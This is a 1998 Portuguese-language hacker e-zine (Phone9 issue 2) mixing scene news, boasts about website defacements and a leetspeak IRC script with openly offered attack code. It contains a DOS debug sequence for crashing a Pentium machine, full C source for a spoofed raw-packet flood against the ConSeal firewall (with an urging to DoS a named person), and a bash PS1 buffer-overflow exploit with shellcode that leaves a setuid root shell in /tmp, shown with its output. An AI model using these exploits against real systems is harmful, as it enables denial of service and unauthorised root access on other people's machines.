P h o n e 9 (c) 1 9 9 8  p r o d u c t i o n s
			  reg - (r) none rights reservaded.

                   __                                   
         __/\______\ \_  ________   ________    _______ ___/\_
         \__      //   \/        \__\___   /____\__   _/  _   \
         //   --  /  [-]\   __/   \    /_     /  /_____\___.  /
       _/     ___/___/   \_     __/\____/    /______   /__/ //
       \/----/      /_____\\___/      //____/     /____\____/
  	        [c]		P h o n e 9 (c) p r o d u c t i o n s.


								  the phone9 communications,
								     - http://www.phone9.org
....												....
Phear Yer Phone, 01 de novembro de 1998.			 Phone9 Communications
edicao no.02| phone9@phone9.org					   systems, Inc.
[P9] ------------------------------------------------------------------ [P9]
[m o l e c u l e s]	     [face your phear]		   [s e l u c e l o m]
				      [gigant robots]
			        [intergalatik kriminal]

 Bem vindo a mais uma edicao da Phone9, 			        .[ektoplazma.]
							 editors: kleptomaniak - bloodroot
---											 	 ---
     P h o n e 9   c o m m u n i c a t i o n s   s y s t e m s , i n c

     _____  ____		   
    /   _ \/ _  \          editor-in-chief: bloodroot|kleptomaniak       [P]
    \  ___/\__  /                co-editor: ]Puruc4[ 	                   [H]
     \ \.[P9]/ /                    layout: ]Puruc4[                     [O]
	\/     \/          relacoes publicas: Dr. Eneas [PR0NA]            [N]
    [the phone9]           		 31337: bahamas, paranoia, Cacaio    [E]
     [systems.]              askii efektiz: bloodroot - alph1x t3k       [9]
	                                                          Phone9, Inc.

+-- -- --- -- ---- --- --+ the evil empire
			  .user| face your phear, Now!!!
				 : '98 productions. [c]
[Ph0ne9.]			 +--- ---  ---  - -----  ---  ---  -+ Punkass Stuffs

  The Phone9 Communications Systems,  

    1] .ph0ne9.sp0ts
    2] 31337.ini, o IRC zkr1pt dos dUhd1nh4s - by bloodroot & paranoia
    3] Conseal Firewall Killer - by k2
    4] /bin/bash buffer overflow, cartas de amor para bash
    5] Microsoft Internet Exploder BUG!!!  boguzes
    6] Bill Gate e' a besta (666) - by beltra
    7] Anti Bina System, Hackeando sistema telefonicos digitais
    8] Netbus Sekurity Advisory
    9] Protegendo sua maquina contra loops - by Kasper
   10] Rompendo permissoes em sistemas NT
   11] .login backdoor
   12] Eworm project - by Dr.Sm0g & tAff.
   13] /lost+found, the P9 garbage can
   14] IIS security issues, trabalhando com logs
   15] Novell Netware login Hack
   16] POP3 sniffer
   17] 0800 hack-a-call - by Dare Devil
   18] Wire tapping!!! Hackeando linhas telefonicas
   19] Password smugler
   20] Microsoftz advisory: ICQ, warez group???
   21] selbstmordert, o fim esta proximo
          _   _          
         ((___))                       
        [  x x  ]          
         \     /                       
    _____('(U)')_____      also starring in the P9 enterprise, 
   / P9           P9 \        
  /   /\ __/ \__ /\   \      
  \ __\/  '___'  \/__ /   director                     blood Weirdo arouto
  /    \  /_|_\  /    \   co-director                  Dr. Samurai Sm0guzes    
  \_|__/_ |_|_| _\__|_/   Special Guest                Ugly bi0h4zard    
     \____[:():]____/     Camera man I                 "Exceptional" x1p
     |.:    .:     \	  Camera man II                Alph1x Star Tr3k
    /.      \:.     \_	  Naked girl dancing           Cezinha Terezinha
 __/.        \        \   Stupid bitch back there      deathwh0re.com
 \    ___    /_   ___  \  Stupid bitch out there       unWizard Magic of Oz.
  \__/   \__/  \_/   \_/  systems failure              The Bad Cowz...
     \_|_/	[P9] \_|_/    The uglyest name around      dare^devil

                                                    ......:
        					    ...............  .:
               - [www.phone9.org] -     :by Bloodroot : ..:
	  :...............................:& Dr.Sm0g    : ..:
        ................................:...       ...:...:
        :  - Phone9 Journal, no.02      : productions : ..:
        :...............................:..        ...:  .:
    	   :..... [ ] - [ Phone9 ] - [ ] ...................:


	quotas.:
	 Paranoia mata o pau, mostra a cobra e balanca o pin** - O povao.
	 smack my dick up - x1p
	 Size does matter, ask to ya mamma!!! - alph1x t3k.

		                --> ph0ne9.0rg <--	

	agradecimentos: cacaio, e o pessoal da deathknights... udigrudi.0rg,
	e e' claro o pessoal da bos(ta)-br... =) thanx you'all.
[P9]  ----------------------------------------------------------------  [P9]
 ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
 ³1 - .ph0ne9.sp0ts									 ³°°
 ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ by Bloodroot & pals ³°°
                                                   ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ°°

   Bem vindo a mais uma edicao da Phone9,  nos estamos comemorando  a 3a.
   Conseguimos passar por todos  os nossos problemas e  conseguimos,  por
   fim, sobreviver 2 edicoes da zine :) Nos agora  estamos com um time de 
   pessoas muito mais desenvolvido, e nos especificamos mais algumas coi-
   sas quanto a zine, nos especificamos as datas de lancamento da zine... 
   Veja:

		      01 de novembro -- edicao no.02'98 [G. wonder what it is??]
	            01 de  janeiro -- edicao no.03'99
			01 de    marco -- edicao no.04'99
			01 de     maio -- edicao no.05'99
                  01 de    julho -- edicao no.06'99
			01 de setembro -- edicao no.07'99
 			01 de novembro -- edicao no.08'99
			01 de  janeiro -- edicao no.09'2000

   Basicamente, a zine sai a cada 2 meses,  ou seja, a edicao 09 da  zine
   saira no primeiro dia do seculo 2000, se o mundo nao for destruido se-
   gundo as profecias de Nostradamus, entao a edicao  sera lancada dia 01
   de janeiro do seculo 2000.

   Quanto ao problema com a phone9.org, nos ja resolvemos isto e enquanto
   o servidor nao fica pronto,  os endereco que voce pode acessar a  zine 
   sao:

	  http://www.puruca.com.br/phone9.
	  http://www.deathknights.com/phone9
	  http://microsoftz.cjb.net
	  http://www.ereethackers.com/phone9
        http://www.webcrunchers.com/phone9
        http://www.webelite.com.br/phone9
        
     Todos  estes sites estao 24h. por dia funcionando, talvez exceto o
     ereethackers.com, pois este servidor e' meio louco. =)

	   Em breve, (021)xxx.xxxx BBS da Phone9, quando estiver toda
	   setupada, nos iremos avisar voces.

   Bom, agora que algumas questoes da zine ja foram explicada, e resolvi-
   das entre nos e os leitores (eu acho :)) entao vamos para frente com a
   zine. :)  

     [.m0td.]
       "Oh Migod, they killed kenny... You bastard" - Stan 
	 
   Acaba uma edicao e nos estamos la,  firme  e forte escrevendo a  zine,
   e eu tenho que admitir e dificil rodar uma zine, pois existem um bando
   de gente muito estranha, ou querendo desbancar a zine, ou entao mandan
   do todos os tipos de flood para o seu email, e deprimente a quantidade
   de coisas que nos vemos por ai, e a quantidade de coisas que nos manda
   mos para o lixo :) Cada maniaco que aparece, mandando mensagens anony-
   mas pelo anonymizer dizendo que pegou meu telefone, meu endereco com o
   ultimo vibrador lancado, e impressionante como estes carinhas se acham
   deuses... Com seus estupidos nukes, e pings, que  depois de um  tempo,
   mudam de nick, e perguntam como se instala o linux.... Bah!!!  E  cada
   coisa que me  mandam, uma vez um cara colocou meu email em um tipo  de
   pesquisa, que enviam mais de 500kbytes por hora para o seu mail... Que
   coisa naum... Eles pelo menos  sabem escrever o meu email  direitinho,
   ou sera que foi a baba deles que escreveu para eles??? Bom, ai nos fi-
   camos em contradicao, ja que depois que  nos ensinamos a  desativar  o
   CyberPatrol, tem um bando de porno-kidyes que andam fazendo coisas bem
   malvadas, considerando que o comum: "Clica... Clica... Clica... Aihhh"
   ja nao e' mais comum para eles :) Quantos nerds e merds que existem ai
   eu fico ate espantado, pois as vezes eu penso:   Sera que demencia  e' 
   contagiosa??? Pois ao que me parece,  e muito mais  contagioso do  que
   pensavamos... Ou apenas sera a volta dos Master Of Shit??? Bom, depois
   do que o Sm0g fez no site deles  (psynet.net/moszine) voce pensa  sera 
   que um deles foi assassinado pelas suas tecnicas 31337??? Ou sera  que
   o sabio, percebeu que nao conseguia entrar para a AACD, mesmo escreven
   do daquela forma tao perigosa e malvada como eles escrevem... 53r4????
   
   E mudando de malvados para futeis, nos ficamos sabendo que a  miramax,
   conhecido estudio de cinema, esta produzindo um filme sobre a historia
   do Kevin Mitnick, baseado no livro takedown, escrito por John Markoff,
   e Shimomura, o livro e' a historia ficcionaria da captura de  Mitnick,
   adulterada com as mentiras as quais John Markoff e Shimomura  inventa-
   ram neste livro, varios fatos mentirosos sobre a historia serao descri
   tos no filme, como uma briga corpo a corpo, entre Shimomura e Mitnick,
   onde Mitnick, sendo o malvado e criminoso,  pega uma tampa de lata  de
   lixo e bate na cara de Shimomura, deixando o japaboy em knock out!  :)
   A indignacao quanto a mentira que sera mostrada no filme, causa varios
   protestos contra o filme da Miramax, pois e' bem possivel que os fatos
   descritos no filme e que sao simplesmente falsos, possam interferir em
   um possivel julgamento contra Kevin Mitnick, se houver algum...   Pois
   alguns futeis e comprados jures, que concerteza serao intimidados pela
   rede de mentiras que o filme expoe quanto ao caso do mitnick.   Varios
   grupos de protecao de hackers como EFF e outros, estao indignados  com
   a futilidade e mentiras que o filme propoe... Quem  deseja saber  mais
   sobre o filme veja os enderecos e sites abaixo:

	Endereco dos estudios Miramax em Hollywood, USA:
	7966,  Beverly Blvd.
	Los Angeles, CA 90048
	001+(213)951-4200 Phone
	001+(213)951-4315 fax 
	ou...
	375 Greenwich St., 3o. Andar
	New York, NY 10013
	001+(212)941-3800 Phone
	001+(212)941-3949 fax

	Kevin Mitnick Defense Fund:
	www.kevinmitnick.com
	www.freekevin.org
	www.phone9.org/foi

   Ainda quanto ao caso do Kevin  Mitnick,  ele nao recebe um  julgamento
   a mais de 3anos e alguns meses. Entao agora nos fazemos um apelo  para
   todas as pessoas que tem um site, que coloquem um contador de a quanto
   tempo kevin D. Mitnick continua preso sem um julgamento, ai vao as in-
   trucoes:
--
Primeiro passo:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

^^^^^^^^^
O seu  deve ficar assim:

Segundo Passo: Copie este script para o seu index.html
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=





Terceiro Passo: Paste the table below in you document.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Kevin Mitnick Contador: Este e' o tempo em que Kevin Mitnick, nao tem um julgamento cedido pelo governo americano.
-- Recentemente varias listas de discussoes tem falado bastante sobre uma possivel conferencia hacker no Brasil, semelhante a DefCon e muitas outras por ai.. O pessoal da Bos e outros lugares estao tentando fazer um encontro deste tipo, datas, nomes, promovedores entre outros deta- lhes, ainda estao sendo organizados e nao tem data de estreia e nem de esperanca, por enquanto nos so ficamos na vontade de ter um encontro do tipo, por isso nos pedimos a colaboracao de quem puder contribuir com algo para o evento, servidores, empresas de seguranca, consorcios, bureaus de informatica e ate anonimos podem contribuir com esta campa- nha, apenas manda um email para: blood@puruca.com.br, que nos entrare- mos em contato com voces. Quanto a invasao da Mandioca, pelos camaradas da Nearz, eu achei uma boa atidude deles em mudar a pagina, ja que todos tinham acesso na man dic, mas ninguem tinha coragem de mudar o htm ou entao porque nao que- riam que o acesso ao servidor seria acabado, acabou que a nova dona da Mandioca, foi comprada pelo preco de uns bons megabytes de wordlists, espero que os administradores da mandic nao fiquem muito chateados com a frustacao que eles causaram no seu sistema. :) Voce pode contatar a nearz pelo endereco: http://members.tripod.com/nearz http://www.cyberspace.com/~nearz http://www.phone9.org/nearz --> Soon... http://www.microsoftz.com/nearz O bug do ano 2000, continua acabando com as maquininhas por ai :) Ele agora tambem afeta computadores que trabalham em pequenos escritorios como os das locadores de videos, que so tem 2 digitos no lugar do ano ao invez de 4. Vejamos como 4 numeros afetam a vida de muita gente, tem programador cobrando 30 dolares por linha de codigo mudada. Deve- rao sair muitos M$ deste negocio... anti-2000 Concept??? E para os moloides de carteria executem o seguinte e travem a sua ma- quinas que rodam pentium!!! hehehehehe... Para testar a vulnerabilidade do pentium no seu computador, faca o seguinte: no prompt do DOS: (obs. e' melhor que voce faca isto pelo DOS mesmo... :)) debug n debug.com a db f0 db 0s db c7 db c8 rcx 4 w Quando voce acabar de digitar este ultimo comando, entao voce sabe que o seu computador travou, e voce tera que reboota-lo dali :) [.m0td.] --- [ The End ] -- [.m0td.] 1998. (c) phone9.org .[news]. - breaking tha news - .[news]. [19/09] - Telerj finalmente reduz a tarifa em alguns servicos que ela oferece, como: O valor da instalacao de novas linhas e o plano de expansao, teve uma reducao no seu preco tambem. As reducoes na instalacao de linhas caiu de $147,99 para o ainda alto $82,25. O preco dos telefones comprados no plano de expansao teve uma reducao de 45,65%, o que torna o preco de $142,68 reais para $77,54 e os novos lerdos das telerdas tambem terminaram com a cobranca de levar a linha, da cai- xa de verificacao (armario), ate a caixa do predio e assim por diante ate a casa do usuarios. Eu acho que finalmente vou poder colocar aquela LP na minha casa :) ?!?! [02/09] - Site filial ao da nasa.gov, foi invadido por raquers, o grupo HFG 'Hacking for Girlies' tem ultimamente feito a cam panha de purificacao dos sites. :)Invadindo sites que eles possam ter em mente. Na lista dos atacados estao os: nytimes.com|jpl.nasa.gov, entre outros. [06/09] - A MANDIoCa, foi invadido pelo NearDz, mudando a pagina ofi- cial da mandic ( index.html), se voce quiser ver a pagina hackeada da nova dona da mandic, va em: - deathknights.com/phone9/mandioca.html [14/09] - Slashdot, o centro de informacoes para linux nerds, foi in- vadido recentemente por um dUhD1nhas chamado de H4G1S, este ninja, foi o mesmo que invadiu o nasa.gov em 97. O que e' mais interessante na sua invasao é que durante a invasao da nasa, ele clamou por justica nos casos do BernieS e Mitnick desta vez ele manda um simples e puro "fuck kevin mitnick" e uma penca de outros caras. [13/09] - New York Times Hackeado, pelo grupo HFG, em protesto contra a grande investida na midia, implicando que mitnick seja um ladrao moderno, o ataque foi dedicado a John Markoff, o es- critor do livro sobre mitnick takedown e' o jornalista mais estupido, que fez toda a difamacao contra mitnick durante a sua procura. [16/09] - X-ploit, grupo hacker mexicano, invadiu mais um site gover- namental do mexico, realmente nao tenho muito informacao so bre o motivo da invasao, mas voces sabem, derrepente sera a resulreicao do exercito zapatista na internet??? Frase muito comum do grupo x-ploit: "O mexico e' para os me xicanos, a internet e' para o Xploit." [19/09] - Chico.com.br, foi hackeado por um dos membros da Phone9, Puruca o site foi invadido em protesto ao lamer, que se dizia o racker do momento, sendo ele e a mae dele, um bando de lamers de merda Voce pode ver a pagina hackeada em www.puruca.com.br/chico.html [21/09] - Testemunho do clinto e' mostrado na TV em mais de 400 canais si multaneamente no mundo todo... Espero que ele nao tenha respon- dido a questao sobre o tamanho do bigulhim dele. ;) [01/10] - Lancado o askii pack da Phone9, feito por alph1x t3k e b_root, Este pode ser achado em: puruca.com.br/phone9/askiiat.txt [30/10] - Crai.com.br, hackeada por Fak, que deixou uma mensagem para nos e para o pessoal da microsoftz.cjb.net!!! bloodroot bloodroot@webcrunchers.com [Gettin' seek of being weirdo] [being a 'especial' dude] ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³2 - 31337.ini, o script elitaum para IRC ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ by paranoia & b_root ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ°° O pessoal da Udigrudi, criou um script elitaum para IRC, que faz com que suas letras fiquem mais 31337 que nunca. Assim voce pode assustar os ratoes que existem pela net. :) O 31337.ini, faz parte da campanha de produtos desenvolvidos pela Campanha, Salvem as formigas do Sul do Paquistao, que esta associado com a microsoft.com e e' claro com o sistema (011)1406 e o 'Ligue Jah.', entao em mais uma producao 31337 nos apresentamos 31337.ini, o script elitaum... thanx to: paranoia - alquem K. naoseioque Gay Bom, por enquanto nesta edicao nos oferecemos duas funcoes para o zkr1pt, a primeira e': Transformar a sua escrita para 31337, e a segunda e encrip tar as conversas no IRC. -- 31337.ini -- para todos os dUhD1nHas ai fora, b1tch3z f0r j00z!! n0=ele { n1= say :::::> zkr1pt elitaum 2000, 31337.ini <::::: n2= say ::::::> 0 2kr1p7 313374um d0 br4211 <::::::: n3= say :::::::::[ http://www.phone9.org ]:::::::::: n4= say ::::::::::|by paranoia|bloodroot|::::::::::: n5= say ----- 5173 elitaum -> udigrudi.org <- ------ n6= set %var.textl *1 n7= set %var.textl $replace(%var.textl,e,3) n8= set %var.textl $replace(%var.textl,i,1) n9= set %var.textl $replace(%var.textl,a,4) n10= set %var.textl $replace(%var.textl,s,5) n11= set %var.textl $replace(%var.textl,t,7) n12= set %var.textl $replace(%var.textl,o,0) n13= set %var.textl $replace(%var.textl,l,1) n14= set $var.textl $replace(%var.textl,g,9) n15= set $var.textl $replace(%var.textl,z,2) n16= set $var.textl $replace(%var.textl,k,/{) n17= set $var.textl $replace(%var.textl,y,j) n18= set $var.textl $replace(%var.textl,elite,31337) n19= set $var.textl $replace(%var.textl,eleet,31337) n20= set $var.textl $replace(%var.textl,eleeti,313371) n21= say %var.textl n22=} n23=Decrypto{ n24=set %encrypto *1 n25=%encrypto = $replace(%encrypto,^,.) n26=%encrypto = $replace(%encrypto,*,?) n27=%encrypto = $replace(%encrypto,»,!) n28=%encrypto = $replace(%encrypto,ë,a) n29=%encrypto = $replace(%encrypto,¥,b) n30=%encrypto = $replace(%encrypto,£,c) n31=%encrypto = $replace(%encrypto,",d) n32=%encrypto = $replace(%encrypto,ç,e) n33=%encrypto = $replace(%encrypto,ô,f) n34=%encrypto = $replace(%encrypto,³,g) n35=%encrypto = $replace(%encrypto,í,h) n36=%encrypto = $replace(%encrypto,|,i) n37=%encrypto = $replace(%encrypto,¬,j) n38=%encrypto = $replace(%encrypto,%,k) n39=%encrypto = $replace(%encrypto,½,l) n40=%encrypto = $replace(%encrypto,m,®) n41=%encrypto = $replace(%encrypto,å,n) n42=%encrypto = $replace(%encrypto,¡,o) n43=%encrypto = $replace(%encrypto,¤,p) n44=%encrypto = $replace(%encrypto,«,q) n45=%encrypto = $replace(%encrypto,²,r) n46=%encrypto = $replace(%encrypto,µ,s) n47=%encrypto = $replace(%encrypto,¶,t) n48=%encrypto = $replace(%encrypto,©,u) n49=%encrypto = $replace(%encrypto,¢,v) n50=%encrypto = $replace(%encrypto,·,w) n51=%encrypto = $replace(%encrypto,`,x) n52=%encrypto = $replace(%encrypto,ß,y) n53=%encrypto = $replace(%encrypto,ä,z) n54=/echo 4 %encrypt n55=} n56=Encrypto { n57=set %encrypto *1 n58=%encrypto = $replace(%encrypt,.,º) n59=%encrypto = $replace(%encrypt,?,±) n60=%encrypto = $replace(%encrypt,!,») n61=%encrypto = $replace(%encrypt,a,ë) n62=%encrypto = $replace(%encrypt,b,¥) n63=%encrypto = $replace(%encrypt,c,£) n64=%encrypto = $replace(%encrypt,d,“) n65=%encrypto = $replace(%encrypt,e,ç) n66=%encrypto = $replace(%encrypt,f,ô) n67=%encrypto = $replace(%encrypt,g,³) n68=%encrypto = $replace(%encrypt,h,í) n69=%encrypto = $replace(%encrypt,i,|) n70=%encrypto = $replace(%encrypt,j,¬) n71=%encrypto = $replace(%encrypt,k,%) n72=%encrypto = $replace(%encrypt,l,½) n73=%encrypto = $replace(%encrypt,m,®) n74=%encrypto = $replace(%encrypt,n,å) n75=%encrypto = $replace(%encrypt,o,¡) n76=%encrypto = $replace(%encrypt,p,¤) n77=%encrypto = $replace(%encrypt,q,«) n78=%encrypto = $replace(%encrypt,r,²) n79=%encrypto = $replace(%encrypt,s,µ) n80=%encrypto = $replace(%encrypt,t,¶) n81=%encrypto = $replace(%encrypt,u,©) n82=%encrypto = $replace(%encrypt,v,¢) n83=%encrypto = $replace(%encrypt,w,·) n84=%encrypto = $replace(%encrypt,x,`) n85=%encrypto = $replace(%encrypt,y,ß) n86=%encrypto = $replace(%encrypt,z,ä) n87=say %encrypto $+ (zkr1pt 31337 2000.) n88=} -- 31337.ini -- para todos os dUhD1nHas ai fora, b1tch3z f0r j00z!! 31337.ini, toda a edicao da Phone9, um novo update do 31337.ini by paranoia, e alguem K. Gay, e com novos updates do bloodroot. dUhD1Nh45, os idiotas por tras de todo o plano mal feito =) 7h3 31337 & 7h4 dUhD1Nh45!!! by paranoia - bloodroot. [blood@phone9.org]|[paranoia@phone9.org] ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³3 - Conseal Firewall Killer ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ by k2. ³°° ÀÄÄÄÄÄÄÄÄÄÄÙ°° ConSeal firewall killer by k2. O firewall Conseal da signal9 (signal9.com), tem uma vulnerabilidade nas sua estruturas, permitindo que voce possa fechar o firewall por meio de um ataque DoS, e' bem util na hora de mandar pacotes obscu- ros para usuarios de win95/98, a empresa ainda nao lancou nenhum mas e' seguramente recomendavel que voces usem outro firewall pessoal (nao recomendo nenhum, ipfwadm???). O bug se divide em duas partes, na primeira ele explora a opcao 'learning' do firewall, da qual novas novas regras de tratamento de pacotes do firewall sao adaptados, um grande flood no IP que roda o firewall, assim a cada pacote especial, novas regras serao adaptadas, ate' que o numero de regras fique cheio ai o firewall fecha e o sistema reboota. A segunda parte do bug, se a opcao de logar todos os ataques, entao voce pode mandar um flood de ataques que este ira logar todos, se a quantidade for extensiva de pacotes for o suficiente para lotar o HD da vitima, caso isto acon teca, entao o programa fecha e provavelmente o sistema ira rebootar;) Veja o codigo abaixo. by Noc-Wage. --[ consealdos.c ]-- #include #include #include #include #include #include #include #include #include #include #include #ifdef BROKEN_LIBC #include #else #define u_char unsigned char #define u_short unsigned short #endif struct sockaddr sa; int main(int argc,char **argv) { int fd; int x=1; int hosti=192; int hostii=168; int hostiii=1; int meep=0; int fooport=1; int numpack=0; char funhost[15]; struct sockaddr_in *p; struct hostent *he; u_char gram[36]= { 0x45, 0x00, 0x00, 0x26, 0x12, 0x34, 0x00, 0x00, 0xFF, 0x11, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0x00, 0x12, 0x00, 0x00, '3','1','3','3','7','8','9','0' }; if(argc!=3) { fprintf(stderr,"Saihyousen, by Noc-Wage\n"); fprintf(stderr,"The faster your connection to the internet is (latency wise, not bandwidth)\n"); fprintf(stderr,"and the lower the CPU speed of the victim will\nincrease probability of success\n"); fprintf(stderr,"usage: %s victim num_of_packets Ex: saihyousen 127.0.0.1 40000\n",*argv); exit(1); }; if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))== -1) { perror("requires RAW SOCKETS"); exit(1); }; #ifdef IP_HDRINCL if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0) { perror("setsockopt IP_HDRINCL"); exit(1); }; #else fprintf(stderr,"we don't have IP_HDRINCL :-(\n\n"); #endif /* The stuff below is so that it's not fully sequential i.e 100.100.100.101, 100.100.100.102 */ for (numpack=0;numpack<=atoi(argv[2]);numpack++) { if (meep==0) { ++hosti; meep++; } if (hosti>254) hosti=1; if (meep==1) { ++hostii; meep++;} if (hostii>254) hostii=1; if (meep==2) { ++hostiii; meep=0;} if (hostiii>254) hostiii=1; sprintf( funhost, "%i.%i.%i.%i",hosti,hostii,hostiii,hosti); (he=gethostbyname(funhost)); bcopy(*(he->h_addr_list),(gram+12),4); if((he=gethostbyname(argv[1]))==NULL) { fprintf(stderr,"can't resolve destination hostname\n"); exit(1); }; bcopy(*(he->h_addr_list),(gram+16),4); fooport++; /* resets the port to 1 if it's nearing the end of possible values */ if (fooport>65530) {fooport=1;}; *(u_short*)(gram+20)=htons((u_short)fooport); *(u_short*)(gram+22)=htons((u_short)fooport); p=(struct sockaddr_in*)&sa; p->sin_family=AF_INET; bcopy(*(he->h_addr_list),&(p->sin_addr),sizeof(struct in_addr)); if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(struct sockaddr)))== -1) { perror("sendto"); exit(1); }; /* printf("Packet # %i\n", numpack); */ /* Turn that on to see where you are.. it'll slow the attack though */ }; printf("Attack against %s finished", argv[1]); putchar('\n'); return 1; } --[ consealdos.c ]-- Para se proteger contra este tipo de ataque e' bem simples, apenas deshabilite as opcoes de 'log attack' e 'new rules', assim o fire- wall fica seguro contra estes tipos de ataques... ;) obs: phineas usa conseal, DoS nele!!!! heheheh k2@phone9.org - k2@microsoftz.com ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³4 - /bin/bash buffer overflow, cartas de amor para bash ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ by bloodroot. ³°° ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ°° Bom, recentemente alguem com um nome muito estranho (hihihi!), descobriu um buffer overflow dentro do /bin/bash, que ocorre quando a opcao '\w' quando dentro do PS1. Eis o codigo do exploitito: --[ code -tp.c- ]-- #include char code[] = "\xeb\x24" /* jmp GETADDR */ /* RUNPROG: */ "\x5e" /* popl %esi */ "\x89\x76\x08" /* movl %esi,0x8(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x88\x46\x07" /* movb %al,0x7(%esi) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ "\xfe\x06" /* incb (%esi) */ "\xfe\x46\x04" /* incb 0x4(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx */ "\xcd\x80" /* int $0x80 */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x89\xd8" /* movl %ebx,%eax */ "\x40" /* incl %eax */ "\xcd\x80" /* int $0x80 */ /* GETADDR: */ "\xe8\xd7\xff\xff\xff" /* call RUNPROG */ ".tmp.tp"; /* Program to run .XXX.XX */ int ADDR=0xbffff2ff; void main(void) { char dir[256]; int i, align; printf("BASH '\w' opcao PS1 buffer overflow.\n"); printf("- Criando /tmp/tp.c\n"); system("echo 'main() {' > /tmp/tp.c"); system("echo 'system(\"cp /bin/sh /tmp/sh\");' >> /tmp/tp.c"); system("echo 'system(\"chmod +s /tmp/sh\");' >> /tmp/tp.c"); system("echo '}' >> /tmp/tp.c"); printf("- Compilando /tmp/tp.c to /tmp/tp\n"); system("gcc -o /tmp/tp /tmp/tp.c"); printf("- Removendo /tmp/tp.c\n"); system("rm -f /tmp/tp.c"); /* Computing alignment for the 'address' directory */ getcwd(dir,255); align=(strlen(dir)+2) % 4; memset(dir,'A',255); dir[255]=0; printf("- Criando dir. AAA.../AAA.../AAA.../CODE.../ADDR...\n"); mkdir(dir,0777); chdir(dir); mkdir(dir,0777); chdir(dir); mkdir(dir,0777); chdir(dir); /* create directory which name is our code */ mkdir(code,0777); chdir(code); /* create directory which name is return addresses */ for(i=align;i<252;i+=4) *(int *)&dir[i]=ADDR; mkdir(dir,0777); chdir("../../../../"); printf("- OK.\n\n"); } --[ code -tp.c- ]-- rode isto como usuario normal do sistema: [raquerzao]:~$ id uid=1000(reqUer) gid=1000(raqUer) groups=1000(test) [raquerzao]:~$ ./bashps1 BASH '\w' opcao PS1 buffer overflow. - Criando /tmp/tp.c - Compilando /tmp/tp.c to /tmp/tp - Removendo /tmp/tp.c - Criando diretorios AAA.../AAA.../AAA.../CODE.../ADDR... - Ok. Agora provavelmente voce devera ter o tp.c no seu diretorio /tmp. [raquerzao]:~$ ls -l /tmp/tp -rwxr-xr-x 1 test test 3981 Sep 4 20:54 tp Entao como r00t rode: bash# export PS1='bash:\w\$ ' debian:~# cd ~/reqUer debian:/home/reqUer# cd AAAAAAAA*/*/*/*/* shell-init:couldnotgetcurrentdirectory:getwd:cannotaccessparentdirectories shell-init:couldnotgetcurrentdirectory:getwd:cannotaccessparentdirectories Entao a bash morre (sniff ;)) ai, é facil, [raquerzao]:~$ ls -l /tmp/sh -rwsr-sr-x 1 root root 304676 Sep 4 20:55 sh Mas espere, nao é so issu!!! Se voce ligar (011)1406, voce podera adiquirir esta linda carta de amor para o tcsh, outra exclusivida de das empresas elitaum de deus ;) Bom, a mesma coisa funciona com o /bin/tcsh... Trusted Cshell??? I dont think soo :) Bom, de qualquer modo no tcsh, e' possivel voce instalar um patch para que esta carta de amor para de chegar ao seu sistema,.abaixo --- tcsh-6.07.06.orig/sh.dir.c +++ tcsh-6.07.06/sh.dir.c @@ -78,7 +78,7 @@ char path[MAXPATHLEN]; - tcp = (char *) getwd(path); + tcp = (char *) getcwd(path, MAXPATHLEN); if (tcp == NULL || *tcp == '\0') { xprintf("%s: %s\n", progname, path); if (hp && *hp) { @@ -549,7 +549,8 @@ } #endif /* 